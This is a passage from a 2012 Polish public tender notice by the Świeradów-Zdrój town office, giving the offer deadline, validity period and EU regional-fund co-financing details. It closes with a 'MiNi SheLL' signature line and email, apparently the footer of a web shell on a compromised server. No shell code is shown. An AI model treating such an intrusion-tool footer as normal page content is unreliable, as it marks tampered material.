niezależne od działania Stron umowy, których przy zachowaniu wszelkich należnych środków nie można uniknąć ani im zapobiec w zakresie niemożności terminowego sprawowania nadzoru autorskiego. W takim przypadku termin wykonania przedmiotu zamówienia w zakresie nadzoru autorskiego zostanie przesunięty o ilość dni równą okresowi wstrzymania prac</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój pokój 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 14:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.Priorytet nr 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i Kultura), Działania 6.4 Turystyka kulturowa Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com